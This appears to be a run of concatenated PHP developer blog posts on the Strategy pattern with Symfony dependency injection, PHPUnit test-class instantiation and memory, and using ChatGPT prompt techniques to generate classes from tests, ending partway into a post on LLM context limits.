public function __construct(
private BuildSpreadsheet $buildSpreadsheet,
private Mailer $mailer,
private WriteSpreadsheet $writeSpreadsheet,
) {
}
public function send(\DateTime $startDate, \DateTime $endDate): void
{
$email = (new Email())
->from('sender@example.com')
->to('recipient@example.com')
->subject('Daily Reports')
->text('Find reports in attached files');
foreach ($this->retrieveDataForReports as $retrieveDataForReport) {
$reportData = $retrieveDataForReport->fromDatabase($startDate, $endDate);
$reportName = $retrieveDataForReport->getName();
$reportSpreadsheet = $this->buildSpreadsheet->using($reportData, $reportName);
$reportFilename = $this->writeSpreadsheet->save($reportSpreadsheet);
$email->attachFromPath($reportFilename, $reportName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
}
$this->mailer->send($email);
}
private array $retrieveDataForReports = [];
public function register(RetrieveDataForReport $retrieveDataForReport): void
{
$this->retrieveDataForReports[] = $retrieveDataForReport;
}
}
If the order in which the reports are built is important, then we need to add a bit of extra logic:
<?php
class EmailDailyReports
{
public function __construct(
private BuildSpreadsheet $buildSpreadsheet,
private Mailer $mailer,
private WriteSpreadsheet $writeSpreadsheet,
) {
}
public function send(\DateTime $startDate, \DateTime $endDate): void
{
$email = (new Email())
->from('sender@example.com')
->to('recipient@example.com')
->subject('Daily Reports')
->text('Find reports in attached files');
foreach ($this->getSortedRetrieveDataForReports() as $retrieveDataForReport) {
$reportData = $retrieveDataForReport->fromDatabase($startDate, $endDate);
$reportName = $retrieveDataForReport->getName();
$reportSpreadsheet = $this->buildSpreadsheet->using($reportData, $reportName);
$reportFilename = $this->writeSpreadsheet->save($reportSpreadsheet);
$email->attachFromPath($reportFilename, $reportName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
}
$this->mailer->send($email);
}
// Public, so the DIC configuration (eg a CompilerPass) can reference it too
public const int DEFAULT_PRIORITY = 100;
private const array NOT_SORTED = [];
private array $unsortedRetrieveDataForReports = [];
private array $sortedRetrieveDataForReports = self::NOT_SORTED;
public function register(
RetrieveDataForReport $retrieveDataForReport,
int $priority = self::DEFAULT_PRIORITY,
): void {
$this->unsortedRetrieveDataForReports[$priority][] = $retrieveDataForReport;
$this->sortedRetrieveDataForReports = self::NOT_SORTED;
}
private function getSortedRetrieveDataForReports(): array
{
if (self::NOT_SORTED === $this->sortedRetrieveDataForReports) {
// Strategies with higher priority need to be executed before the ones with lower priority
krsort($this->unsortedRetrieveDataForReports);
// Flattens strategies by removing the "priority" dimension from the array
$this->sortedRetrieveDataForReports = array_merge(...$this->unsortedRetrieveDataForReports);
}
return $this->sortedRetrieveDataForReports;
}
}
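The sorting in getSortedRetrieveDataForReports() relies on a small PHP idiom worth isolating: strategies are stored in a two-dimensional array keyed by priority, krsort() orders the priorities from highest to lowest, and array_merge(...) flattens away the priority dimension while preserving that order. A self-contained demonstration, with plain strings standing in for the strategy services:

```php
<?php

// Strategies grouped by priority, registered in arbitrary order
// (plain strings stand in for the RetrieveDataForReport services)
$unsorted = [];
$unsorted[100][] = 'Report Two';
$unsorted[200][] = 'Report One';
$unsorted[100][] = 'Report Three';

// Higher priority first: sort by key, in reverse order
krsort($unsorted);

// Flatten: drop the "priority" dimension from the array, keeping the order
$sorted = array_merge(...$unsorted);

var_dump($sorted === ['Report One', 'Report Two', 'Report Three']); // bool(true)
```

Note that within the same priority, strategies keep their registration order, which is why 'Report Two' still comes before 'Report Three'.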
Have you heard of the Symfony component EventDispatcher? While it is a well known implementation of the Observer design pattern, the way the EventListeners (strategies) are registered and executed in the EventDispatcher (context) is very similar to this.
Speaking of Symfony, how would we configure the Dependency Injection Container for this service? First, let's write the YAML configuration:
services:
'EmailDailyReports':
arguments:
- '@BuildSpreadsheet'
- '@Mailer'
- '@WriteSpreadsheet'
calls:
- register:
- '@RetrieveDataForReportOne'
- 200
- register:
- '@RetrieveDataForReportTwo'
- 100
'BuildSpreadsheet': ~
'Mailer': ~
'WriteSpreadsheet': ~
'RetrieveDataForReportOne': ~
'RetrieveDataForReportTwo': ~
Note that we need to write the priorities here in the EmailDailyReports
service definition. The calls section is fine for now, as we only have two
Strategies.
But what if we need to add 1 more report? 2 more reports? 30 more reports?
The entire calls section can be removed from the configuration,
by creating a CompilerPass:
<?php
use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Reference;
class RegisterRetrieveDataForReportsCompilerPass implements CompilerPassInterface
{
public function process(ContainerBuilder $container): void
{
// Get Context service definition
$emailDailyReports = $container->findDefinition(EmailDailyReports::class);
// Get iterable of all the Strategy service definitions (they'll be tagged with the Strategy interface FQCN)
$retrieveDataForReports = $container->findTaggedServiceIds(RetrieveDataForReport::class);
foreach ($retrieveDataForReports as $id => $tags) {
// In theory you can tag a service many times with the same tag,
// but in our case here, there'll only be one tag
foreach ($tags as $tag) {
// call the Setter Injection on the Context service definition
$emailDailyReports->addMethodCall('register', [
new Reference($id),
$tag['priority'] ?? EmailDailyReports::DEFAULT_PRIORITY,
]);
}
}
}
}
Also, make sure to register the CompilerPass in the Bundle:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class MyBundle extends Bundle
{
public function build(ContainerBuilder $container): void
{
parent::build($container);
$container->addCompilerPass(new RegisterRetrieveDataForReportsCompilerPass());
}
}
Note that now the priorities need to be defined in the tags of the RetrieveDataForReport service definitions:
services:
'EmailDailyReports':
arguments:
- '@BuildSpreadsheet'
- '@Mailer'
- '@WriteSpreadsheet'
'BuildSpreadsheet': ~
'Mailer': ~
'WriteSpreadsheet': ~
'RetrieveDataForReportOne':
tags:
- { name: 'RetrieveDataForReport', priority: 200 }
'RetrieveDataForReportTwo':
tags:
- { name: 'RetrieveDataForReport', priority: 100 }
Manually defining the service definition for every class in our project is all fun and games, and having to set tags is fine for now, as we only have two Strategies.
But what if we need to add 1 more report? 2 more reports? 30 more reports?
Since Symfony 3.3, the Dependency Injection's autowiring will inject dependencies named after the type of the service arguments.
This works great for the constructor of EmailDailyReports (note the
conspicuously missing EmailDailyReports, BuildSpreadsheet, Mailer and
WriteSpreadsheet):
services:
_defaults:
autowire: true
'RetrieveDataForReportOne':
tags:
- { name: 'RetrieveDataForReport', priority: 200 }
'RetrieveDataForReportTwo':
tags:
- { name: 'RetrieveDataForReport', priority: 100 }
By adding _defaults.autowire: true, we were able to remove 8 lines of configuration!
Then, since Symfony 5.3,
it is possible to automatically tag all the implementations,
by using the #[AutoconfigureTag] attribute on the interface:
<?php
use Symfony\Component\DependencyInjection\Attribute\AutoconfigureTag;
#[AutoconfigureTag]
interface RetrieveDataForReport
{
public function fromDatabase(\DateTime $startDate, \DateTime $endDate): array;
public function getName(): string;
public static function getDefaultPriority(): int;
}
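For completeness, here's what a hypothetical implementation could look like. The interface is repeated below without the Symfony attribute so the example runs standalone, and the class body (placeholder data included) is invented for illustration:

```php
<?php

// Standalone copy of the interface; in the application it would be
// the #[AutoconfigureTag]-ed RetrieveDataForReport interface above.
interface RetrieveDataForReport
{
    public function fromDatabase(\DateTime $startDate, \DateTime $endDate): array;
    public function getName(): string;
    public static function getDefaultPriority(): int;
}

final class RetrieveDataForReportOne implements RetrieveDataForReport
{
    public function fromDatabase(\DateTime $startDate, \DateTime $endDate): array
    {
        // Invented placeholder: a real implementation would query the database
        return [['date' => $startDate->format('Y-m-d'), 'total' => 42]];
    }

    public function getName(): string
    {
        return 'Report One';
    }

    // Highest priority first: Report One is built before Report Two (200 > 100)
    public static function getDefaultPriority(): int
    {
        return 200;
    }
}

var_dump(RetrieveDataForReportOne::getDefaultPriority()); // int(200)
```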
This only works if _defaults.autoconfigure is set to true in the config
(note the conspicuously missing RetrieveDataForReportOne and RetrieveDataForReportTwo):
services:
_defaults:
autowire: true
autoconfigure: true
You might have noticed that we've added a public static function getDefaultPriority(): int
method to our interface. Since the priorities configuration is gone from YAML,
they have to be returned by the implementations:
- RetrieveDataForReportOne::getDefaultPriority() needs to return 200
- RetrieveDataForReportTwo::getDefaultPriority() needs to return 100
Finally, since Symfony 5.3,
it is also possible to inject an iterator containing all services that have a specific tag,
by using the #[TaggedIterator] attribute. Let's use it in the "Context" class:
<?php
class EmailDailyReports
{
public function __construct(
private BuildSpreadsheet $buildSpreadsheet,
private Mailer $mailer,
private WriteSpreadsheet $writeSpreadsheet,
#[TaggedIterator(RetrieveDataForReport::class, defaultPriorityMethod: 'getDefaultPriority')]
private iterable $retrieveDataForReports,
) {
}
public function send(\DateTime $startDate, \DateTime $endDate): void
{
$email = (new Email())
->from('sender@example.com')
->to('recipient@example.com')
->subject('Daily Reports')
->text('Find reports in attached files');
foreach ($this->retrieveDataForReports as $retrieveDataForReport) {
$reportData = $retrieveDataForReport->fromDatabase($startDate, $endDate);
$reportName = $retrieveDataForReport->getName();
$reportSpreadsheet = $this->buildSpreadsheet->using($reportData, $reportName);
$reportFilename = $this->writeSpreadsheet->save($reportSpreadsheet);
$email->attachFromPath($reportFilename, $reportName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
}
$this->mailer->send($email);
}
}
This means we can remove the CompilerPass (and unregister it from the Bundle).
You'll also note that we've removed the following methods from EmailDailyReports:
- register(): the "Strategies" are no longer injected one by one
- getSortedRetrieveDataForReports(): TaggedIterator supports sorting by priorities, but it requires the "Strategies" to have a static method that returns the priority

To sum up:
- tag all the "Strategy" implementations, by adding the #[AutoconfigureTag] attribute on their interface
- inject an iterable that contains all tagged "Strategy" implementations in the "Context"'s constructor with the attribute #[TaggedIterator(<tag>)]
- set the autowire and autoconfigure parameters to true in the DIC configuration

The use case doesn't demonstrate how to avoid multiple if statements, but this can be done by adding a "predicate" method to the "Strategy": this will allow the "Context" to only execute a subset of the strategies.
It's even possible to only execute the first strategy,
by adding a break in the loop.
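As a sketch of that idea, with a hypothetical supports() predicate (the names below are illustrative, not from the project):

```php
<?php

// Hypothetical predicate-based Strategy: only the first strategy whose
// supports() returns true is executed.
interface Formatter
{
    public function supports(string $format): bool;
    public function format(array $data): string;
}

class CsvFormatter implements Formatter
{
    public function supports(string $format): bool
    {
        return 'csv' === $format;
    }

    public function format(array $data): string
    {
        return implode(',', $data);
    }
}

class JsonFormatter implements Formatter
{
    public function supports(string $format): bool
    {
        return 'json' === $format;
    }

    public function format(array $data): string
    {
        return json_encode($data);
    }
}

class Exporter
{
    /** @param iterable<Formatter> $formatters e.g. injected via #[TaggedIterator] */
    public function __construct(private iterable $formatters)
    {
    }

    public function export(string $format, array $data): string
    {
        foreach ($this->formatters as $formatter) {
            if ($formatter->supports($format)) {
                return $formatter->format($data); // stop at the first match
            }
        }

        throw new \RuntimeException("No formatter supports \"{$format}\"");
    }
}
```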
I've tried to synthesize as much information as possible at the top of this article, in the ironically (yet aptly) named "TL;DR" section.
I hope this'll prove useful to you (it'll definitely be for me!).
Let's set up a project to verify our claim:
mkdir /tmp/phpunit-is-a-cake && cd "$_"
composer init --no-interaction --name 'follow/the-white-rabbit' --type project --autoload '.'
composer require -o --dev phpunit/phpunit:^9.6
Next we write a catchy test:
<?php declare(strict_types=1);
use PHPUnit\Framework\TestCase;
class CatchyTest extends TestCase
{
private string $letMeCountThemForYou = '';
public function __construct($name = null, array $data = [], $dataName = '')
{
parent::__construct($name, $data, $dataName);
echo "How many times have I, how many times have I, how many times have I been instantiated?\n";
}
public function __destruct()
{
echo "Till the morning light\n";
}
public function testOne(): void
{
$this->letMeCountThemForYou .= 'One';
echo "{$this->letMeCountThemForYou}\n";
}
public function testTwo(): void
{
$this->letMeCountThemForYou .= 'Two';
echo "{$this->letMeCountThemForYou}\n";
}
/**
* @dataProvider provider
*/
public function testMore($times): void
{
$this->letMeCountThemForYou .= $times;
echo "{$this->letMeCountThemForYou}\n";
}
public function provider(): array
{
return [['Three'], ['Four'], ['Five'], ['Six'], ['Seven'], ['Eight']];
}
}
Finally we run the tests to see the output:
> phpunit ./CatchyTest.php
How many times have I, how many times have I, how many times have I been instantiated?
How many times have I, how many times have I, how many times have I been instantiated?
How many times have I, how many times have I, how many times have I been instantiated?
Till the morning light
How many times have I, how many times have I, how many times have I been instantiated?
How many times have I, how many times have I, how many times have I been instantiated?
How many times have I, how many times have I, how many times have I been instantiated?
How many times have I, how many times have I, how many times have I been instantiated?
How many times have I, how many times have I, how many times have I been instantiated?
How many times have I, how many times have I, how many times have I been instantiated?
PHPUnit 9.6.19 by Sebastian Bergmann and contributors.
ROne
RTwo
RThree
RFour
RFive
RSix
RSeven
R 8 / 8 (100%)Eight
// [...]
Till the morning light
Till the morning light
Till the morning light
Till the morning light
Till the morning light
Till the morning light
Till the morning light
Till the morning light
And Bob's your uncle! Hang on, what?
The constructor has been called 3 (test methods) + 6 (items in data provider) = 9 times and we can observe that the class attribute's value isn't shared between the test methods but gets reset every time.
And those instances stay alive until the very end of the run, meaning memory usage keeps increasing concerningly throughout the test suite, which also slows it down!
There's a hack that's been around for decades to free the memory and speed up the test suites:
<?php declare(strict_types=1);
use PHPUnit\Framework\TestCase;
abstract class BaseTestCase extends TestCase
{
protected function tearDown(): void
{
$refl = new ReflectionObject($this);
foreach ($refl->getProperties() as $prop) {
if (!$prop->isStatic() && 0 !== strpos($prop->getDeclaringClass()->getName(), 'PHPUnit\\')) {
$prop->setAccessible(true);
$prop->setValue($this, null);
}
}
}
}
The tearDown method is called after each test method, so it's a good place to unset class attributes.
To avoid having to think about it, a catch-all solution using reflection can be put inside a custom BaseTestCase
that'll be extended by all our test classes.
And indeed most codebases don't directly extend PHPUnit's TestCase; for example, Symfony's documentation suggests using FrameworkBundle's KernelTestCase.
But what does it do exactly?
Here's a highly opinionated summary of its code:
<?php
namespace Symfony\Bundle\FrameworkBundle\Test;
use PHPUnit\Framework\TestCase;
use Symfony\Component\HttpKernel\KernelInterface;
abstract class KernelTestCase extends TestCase
{
protected static ?KernelInterface $kernel = null;
protected static function bootKernel(): KernelInterface
{
static::$kernel = new \AppKernel('test', true);
static::$kernel->boot();
return static::$kernel;
}
protected function tearDown(): void
{
if (null !== static::$kernel) {
static::$kernel->shutdown();
static::$kernel = null;
}
}
}
Symfony's HttpKernel is stateless, so being able to boot it (which is slow) only once and store it in a static attribute of a TestCase that all our functional tests extend is great!
However calling bootKernel will always return a new instance of the application kernel and will always boot it,
while the tearDown method also makes sure to nuke it after each test method...
Now I can't pretend to know the reason behind this (maybe assuming that applications are stateful?), nor am I familiar with all the different applications out there and their specific use cases, but that seems very unfortunate to me.
To fix it, we can rewrite it as follows:
<?php declare(strict_types=1);
use PHPUnit\Framework\TestCase;
use Symfony\Component\HttpKernel\KernelInterface;
abstract class MyTestCase extends TestCase
{
protected static ?KernelInterface $kernel = null;
protected static function getKernel(): KernelInterface
{
if (null === static::$kernel) {
static::$kernel = new \AppKernel('test', true);
static::$kernel->boot();
}
return static::$kernel;
}
}
We got rid of the kernel shutdown shenanigans (it can still be called manually if needed), and made sure the Kernel is instantiated (and booted) only once.
But why have this as part of the TestCase? This should be extracted into its own class:
<?php declare(strict_types=1);
use Symfony\Component\HttpKernel\KernelInterface;
class KernelSingleton
{
protected static ?KernelInterface $kernel = null;
public static function get(): KernelInterface
{
if (null === static::$kernel) {
static::$kernel = new \AppKernel('test', true);
static::$kernel->boot();
}
return static::$kernel;
}
}
I know, I know. The Singleton design pattern has been getting a bad rap over the years. But here, it's a legitimate use case!
What have we learned?
That each PHPUnit test method is run in isolation inside its own Test Class instance, so class attribute values will rapidly consume more and more memory (and slow down the test suite), and they cannot be shared between two test methods unless you make them static.
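The same behaviour can be demonstrated outside PHPUnit with a plain class (an illustrative sketch, not from the article's test suite):

```php
<?php

// Each new instance gets a fresh copy of the instance property, while the
// static property is shared across all instances — just like test classes.
class Counter
{
    private int $perInstance = 0;
    private static int $shared = 0;

    public function increment(): array
    {
        ++$this->perInstance;
        ++self::$shared;

        return [$this->perInstance, self::$shared];
    }
}

echo implode(',', (new Counter())->increment()), "\n"; // 1,1
echo implode(',', (new Counter())->increment()), "\n"; // 1,2 — instance count reset, static kept
```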
And perhaps consider using Singletons instead of relying on "FrameworkTestCase".
As for PHPUnit's setUp method, in your opinion, is it best described as "executed before each test method", or as "executed every time the test class is instantiated"?
In my quest to find a use for ChatGPT in my day to day developer activity, I've finally found a helpful scenario!
Let me walk you through my findings about ChatGPT and its "Spec Gen" capacity, so we can learn a thing or two.
When tasked to write a feature, I first write a unit test that specifies the behaviour, for example:
<?php
namespace spec\Vendor\Project;
use Vendor\Project\Service\Filesystem;
use Vendor\Project\File;
use PhpSpec\ObjectBehavior;
class TextEditorSpec extends ObjectBehavior
{
private const FILENAME = '/tmp/file.txt';
private const FORCE_FILE_CREATION = true;
function let(Filesystem $filesystem): void
{
$this->beConstructedWith($filesystem);
}
function it_creates_new_files(File $file, Filesystem $filesystem): void
{
$filesystem->exists(self::FILENAME)->willReturn(false);
$filesystem->create(self::FILENAME)->willReturn($file);
$this->open(self::FILENAME, self::FORCE_FILE_CREATION)->shouldBe($file);
}
}
When using phpspec, especially with the extension spec-gen, running the test will bootstrap for me the corresponding class:
<?php
namespace Vendor\Project;
use Vendor\Project\Service\Filesystem;
class TextEditor
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function open(string $argument1, bool $argument2)
{
}
}
That's pretty good, but it could be better: what if it was able to generate the complete code?
Let's forget about phpspec and use instead PHPUnit, but still with the Prophecy Mocking framework.
Let's ask ChatGPT. Here's the priming prompt:
USER: Act as an expert PHP developer, who's been writing high quality API code for 20 years. Acknowledge with "ok".
Because ChatGPT's Large Language Model (LLM) is able to generate a wide range of text (conversations, essays, movie scripts, poetry, etc.), assigning it a role helps it narrow down its context, hence improving its accuracy for the task we want it to complete: writing PHP code, on a professional level (the persona/role prompt engineering technique).
We also need to consider the Goldfish Memory issue of ChatGPT: it only takes into account the last ~4000 tokens to generate its response, so asking it to give us a short reply helps us save some space.
ChatGPT: ok
LLMs perform better when given some examples, and indeed before asking it to generate code we might want to give ChatGPT some of our code samples (X-Shot prompt engineering technique).
Since coding also requires some level of logic, it is also helpful to include reasoning steps (Chain of Thought prompt engineering technique).
Similarly, asking the LLM to first generate some topic related knowledge, and then reuse that in the further prompts will also increase our success rate (Generated Knowledge prompt engineering technique).
With this in mind, here's the second prompt that provides a test class example:
USER: Here's an example of test class from the project you're working on:
<?php
declare(strict_types=1);
namespace tests\Ssc\Btlr\Cht\Message\Templates\Prompts;
use Ssc\Btlr\App\Filesystem\ReadFile;
use Ssc\Btlr\App\Template\Replace;
use Ssc\Btlr\Cht\Message\Logs\Type;
use Ssc\Btlr\Cht\Message\Logs\WriteLog;
use Ssc\Btlr\Cht\Message\Templates\Prompts\Template;
use tests\Ssc\Btlr\AppTest\BtlrServiceTestCase;
class TemplateTest extends BtlrServiceTestCase
{
/**
* @test
*/
public function it_creates_prompt_from_template(): void
{
// Fixtures
$thoseParameters = [
'last_messages' => 'USER (1968-04-02T18:40:23+00:00): Write code for me, please',
];
$forType = Type::AUGMENTED_PROMPT;
$withConfig = [
'chunk_memory_size' => 15,
'llm_engine' => 'chatgpt-gpt-3.5-turbo',
'logs_filename' => './var/cht/logs',
'prompt_templates_filename' => './templates/cht/prompts',
];
$template = "LAST MESSAGES:\n%last_messages%\nBTLR:\n";
$prompt = "LAST MESSAGES:\n{$thoseParameters['last_messages']}\nBTLR:\n";
$data = [
'entry' => $prompt,
];
// Dummies
$readFile = $this->prophesize(ReadFile::class);
$replace = $this->prophesize(Replace::class);
$writeLog = $this->prophesize(WriteLog::class);
// Stubs & Mocks
$readFile->in("{$withConfig['prompt_templates_filename']}/{$forType['name']}.txt")
->willReturn($template);
$replace->in($template, $thoseParameters)
->willReturn($prompt);
$writeLog->for($data, $forType, $withConfig)
->shouldBeCalled();
// Assertion
$template = new Template(
$readFile->reveal(),
$replace->reveal(),
$writeLog->reveal(),
);
self::assertSame($prompt, $template->replace(
$thoseParameters,
$forType,
$withConfig,
));
}
}
USER: Acknowledge by describing how the use of fixtures, dummies, stubs, mocks and assertions allow to make sure the tested code is behaving as expected. And note the use of the special BtlrServiceTestCase parent class for
TemplateTest.
By the way, the code is from my Super Secret Code project Btlr.
Here's ChatGPT's response:
ChatGPT: In this test class, fixtures are used to provide the necessary data for testing the Template class. The parameters and configuration are defined in $thoseParameters and $withConfig respectively, and the template and prompt strings are defined in $template and $prompt.
Dummies are used to provide the interface of the ReadFile, Replace, and WriteLog classes, without providing any actual implementation, since these classes are not the focus of the test.
Stubs are used to replace the implementation of the ReadFile and Replace classes, by returning a fixed value when their respective methods are called. This ensures that the expected values are used for testing the Template class.
Mocks are used to verify that the WriteLog class is called with the expected parameters. The shouldBeCalled() method ensures that the for() method of the WriteLog class is actually called during the test.
Finally, the assertion compares the result returned by the replace() method of the Template class with the expected prompt string.
The BtlrServiceTestCase class is a special parent class that sets up a test environment for the Btlr service, which can include initializing dependencies, connecting to databases, and setting up configurations. This helps to ensure that tests are run in a consistent and isolated environment, and makes it easier to write tests for the Btlr service.
ChatGPT doesn't have access to the project and its code, it only knows what we've provided in the conversation so far.
So for example it took a wild guess at what BtlrServiceTestCase does and got
it wrong, but for our purpose this is good enough.
The third prompt is an example of the corresponding class:
USER: When tasked with generating the corresponding Template class, from the above TemplateTest test class, here's the code you wrote:
<?php
declare(strict_types=1);
namespace Ssc\Btlr\Cht\Message\Templates\Prompts;
use Ssc\Btlr\App\Filesystem\ReadFile;
use Ssc\Btlr\App\Template\Replace;
use Ssc\Btlr\Cht\Message\Logs\WriteLog;
class Template
{
public function __construct(
private ReadFile $readFile,
private Replace $replace,
private WriteLog $writeLog,
) {
}
public function replace(
array $thoseParameters,
array $forType,
array $withConfig,
): string {
$template = $this->readFile->in(
"{$withConfig['prompt_templates_filename']}/{$forType['name']}.txt",
);
$prompt = $this->replace->in($template, $thoseParameters);
$this->writeLog->for([
'entry' => $prompt,
], $forType, $withConfig);
return $prompt;
}
}
USER: Acknowledge by describing how the test class got translated into its corresponding class.
To which ChatGPT replies:
ChatGPT: The TemplateTest test class served as a guide for implementing the Template class.
First, the constructor of the Template class takes three dependencies, which are also injected in the TemplateTest class as dummies or mocks.
Next, the replace() method of the Template class has the same signature as the test method it_creates_prompt_from_template(), with the addition of a return type declaration for the prompt string.
The implementation of the replace() method in the Template class uses the injected ReadFile instance to read the template string from the filesystem, using the $forType['name'] parameter to construct the file path. It then uses the injected Replace instance to replace placeholders in the template with values provided in the $thoseParameters array, resulting in a $prompt string.
Finally, the method calls the injected WriteLog instance with the $prompt, $forType, and $withConfig parameters, which logs the prompt for the given type and configuration.
Overall, the implementation of the Template class closely follows the structure of the TemplateTest class, and the use of dependency injection ensures that the class can be easily tested in isolation from its dependencies.
With ChatGPT noting that the corresponding class closely follows the structure of its test, it should be now ready.
Let's give it a new test class, and ask it to generate the corresponding code:
USER: Brilliant. Now, in the same coding style as TemplateTest and Template, you are tasked to write the corresponding code for the following ReplyTest test class:
<?php
declare(strict_types=1);
namespace tests\Ssc\Btlr\Cht\Message;
use Ssc\Btlr\Cht\Message\Logs\Type;
use Ssc\Btlr\Cht\Message\Logs\WriteLog;
use Ssc\Btlr\Cht\Message\Memory\Consolidate;
use Ssc\Btlr\Cht\Message\Reply;
use Ssc\Btlr\Cht\Message\Reply\Augment;
use Ssc\Btlr\Cht\Message\Reply\UsingLlm;
use tests\Ssc\Btlr\AppTest\BtlrServiceTestCase;
class ReplyTest extends BtlrServiceTestCase
{
/**
* @test
*/
public function it_replies_to_user_prompt_using_llm(): void
{
// Fixtures
$userPrompt = 'Write code for me, please';
$withConfig = [
'chunk_memory_size' => 15,
'llm_engine' => 'chatgpt-gpt-3.5-turbo',
'logs_filename' => './var/cht/logs',
'prompt_templates_filename' => './templates/cht/prompts',
];
$userPromptData = [
'entry' => $userPrompt,
];
$augmentedPrompt = "USER: {$userPrompt}\nBLTR:";
$modelCompletion = "I'm sorry, dev. I'm afraid I can't do that.";
$modelCompletionData = [
'entry' => $modelCompletion,
'llm_engine' => $withConfig['llm_engine'],
];
// Dummies
$augment = $this->prophesize(Augment::class);
$consolidate = $this->prophesize(Consolidate::class);
$usingLlm = $this->prophesize(UsingLlm::class);
$writeLog = $this->prophesize(WriteLog::class);
// Stubs & Mocks
$writeLog->for($userPromptData, Type::USER_PROMPT, $withConfig)
->shouldBeCalled();
$augment->the($userPrompt, $withConfig)
->willReturn($augmentedPrompt);
$usingLlm->complete($augmentedPrompt)
->willReturn($modelCompletion);
$writeLog->for($modelCompletionData, Type::MODEL_COMPLETION, $withConfig)
->shouldBeCalled();
$consolidate->memories($withConfig)
->shouldBeCalled();
// Assertion
$reply = new Reply(
$augment->reveal(),
$consolidate->reveal(),
$usingLlm->reveal(),
$writeLog->reveal(),
);
self::assertSame($modelCompletion, $reply->to(
$userPrompt,
$withConfig,
));
}
}
USER: Acknowledge by generating the code for the Reply class.
And here's what ChatGPT came up with:
ChatGPT: Sure thing! Here's the code for the Reply class based on the ReplyTest test class:
<?php
declare(strict_types=1);
namespace Ssc\Btlr\Cht\Message;
use Ssc\Btlr\Cht\Message\Logs\Type;
use Ssc\Btlr\Cht\Message\Logs\WriteLog;
use Ssc\Btlr\Cht\Message\Memory\Consolidate;
use Ssc\Btlr\Cht\Message\Reply\Augment;
use Ssc\Btlr\Cht\Message\Reply\UsingLlm;
class Reply
{
public function __construct(
private Augment $augment,
private Consolidate $consolidate,
private UsingLlm $usingLlm,
private WriteLog $writeLog,
) {
}
public function to(string $userPrompt, array $withConfig): string
{
$userPromptData = [
'entry' => $userPrompt,
];
// Augment the user prompt
$augmentedPrompt = $this->augment->the($userPrompt, $withConfig);
// Use LLM to generate a model completion
$modelCompletion = $this->usingLlm->complete($augmentedPrompt);
// Log the user prompt and model completion
$this->writeLog->for($userPromptData, Type::USER_PROMPT, $withConfig);
$modelCompletionData = [
'entry' => $modelCompletion,
'llm_engine' => $withConfig['llm_engine'],
];
$this->writeLog->for($modelCompletionData, Type::MODEL_COMPLETION, $withConfig);
// Consolidate the memories
$this->consolidate->memories($withConfig);
return $modelCompletion;
}
}
ChatGPT: This Reply class has a to method that takes a user prompt and a configuration array as input, and returns the model completion generated by the LLM. The Reply class constructor takes in four dependencies: Augment, Consolidate, UsingLlm, and WriteLog, and stores them as private properties. The to method then uses these dependencies to augment the user prompt, generate the model completion, log both the user prompt and the model completion, and consolidate the memories.
Which is pretty much spot on.
I'd personally have written something slightly different (no comments, have
writeLog for the user prompt at the beginning of the method, and possibly
no intermediate variables).
But I can easily apply those changes!
Thanks to Prompt Engineering (with techniques such as Role / Persona priming prompt, X-Shot, Chain of Thought and Generated Knowledge), it is possible to ask ChatGPT to generate code.
I'm personally using the following prompts to generate the corresponding code for a given Test Class.
Priming Prompt:
Act as an expert PHP developer, who's been writing high quality API code for 20 years. Acknowledge with "ok".
Test Class example prompt:
Here's an example of test class from the project you're working on:
%example_test_class_code%

Acknowledge by describing how the use of fixtures, dummies, stubs, mocks and assertions allow to make sure the tested code is behaving as expected. And note the use of the special BtlrServiceTestCase parent class for %example_test_class_name%.
Corresponding class example prompt:
When tasked with generating the corresponding %example_class_name% class, from the above %example_test_class_name% test class, here's the code you wrote:

%example_class_code%

Acknowledge by describing how the test class got translated into its corresponding class.
Code generation request from Test Class prompt:
Brilliant. Now, in the same coding style as %example_test_class_name% and %example_class_name%, you are tasked to write the corresponding code for the following %test_class_name% test class:

%test_class_code%

Acknowledge by generating the code for the %class_name% class.
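To avoid pasting these by hand, the %placeholder% templates can be filled programmatically; here's a small sketch (the function name is mine):

```php
<?php

// Fill a %placeholder% prompt template from an associative array of
// parameters, using strtr() for a single-pass replacement.
function fillPromptTemplate(string $template, array $parameters): string
{
    $replacements = [];
    foreach ($parameters as $name => $value) {
        $replacements["%{$name}%"] = $value;
    }

    return strtr($template, $replacements);
}

echo fillPromptTemplate(
    'Acknowledge by generating the code for the %class_name% class.',
    ['class_name' => 'Reply'],
);
// Acknowledge by generating the code for the Reply class.
```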
Now, what if you're not practicing Test Driven Development?
I suppose you can tweak it to get ChatGPT to generate tests for you.
All in all, the exploration of ChatGPT's text generation potential turned out to be quite worthwhile, as I ended up finding a practical use case for it in my day to day developer activity.
Yet I suspect there are plenty more scenarios where ChatGPT can help, so I guess the quest continues.
In my quest to find a use for ChatGPT in my day to day developer activity, I've stumbled upon this article: a 175-Billion-Parameter Goldfish, from Allen Pike.
Granted, this doesn't bring me anywhere close to my goal... Yet, it piqued my developer interest, by opening a window on some of the inner workings of ChatGPT.
Let me walk you through my findings about ChatGPT and its Goldfish Memory problem, so we can learn a thing or two.
When using ChatGPT, have you often encountered the frustrating "Goldfish Memory" issue, where it forgets the early conversation's context, resulting in responses that appear unrelated or inappropriate?
This problem is due to how Large Language Models (LLMs), like OpenAI's GPT, work.
They are fundamentally stateless functions that accept one prompt as input, and return a completion as output (I believe the output actually also contains the prompt).
Consider the following first "user" prompt:
Hi, my name is Loïc
And its completion:
Hello Loïc, it's nice to meet you! How can I assist you today?
Now, if we were to send the following second user prompt:
What is my name?
The LLM wouldn't be able to return the expected completion Your name's Loïc,
because they only accept one single prompt, and the name is missing from that
second user prompt.
To build a chat system similar to ChatGPT, instead of sending the user prompt directly to the LLM, we can create an "augmented" prompt which contains all the previous user prompts and their completions, as well as the new user prompt, in a conversation format:
User: Hi, my name is Loïc
Chatbot: Hello Loïc, it's nice to meet you! How can I assist you today?
User: What is my name?
Chatbot:
By sending this augmented prompt to the LLM, we'll now be able to get the
expected completion Your name's Loïc.
But LLMs don't support unlimited sized prompts...
For the sake of the example, let's say the size limit is 5 lines, and the conversation continued as follow:
User: Hi, my name is Loïc
Chatbot: Hello Loïc, it's nice to meet you! How can I assist you today?
User: What is my name?
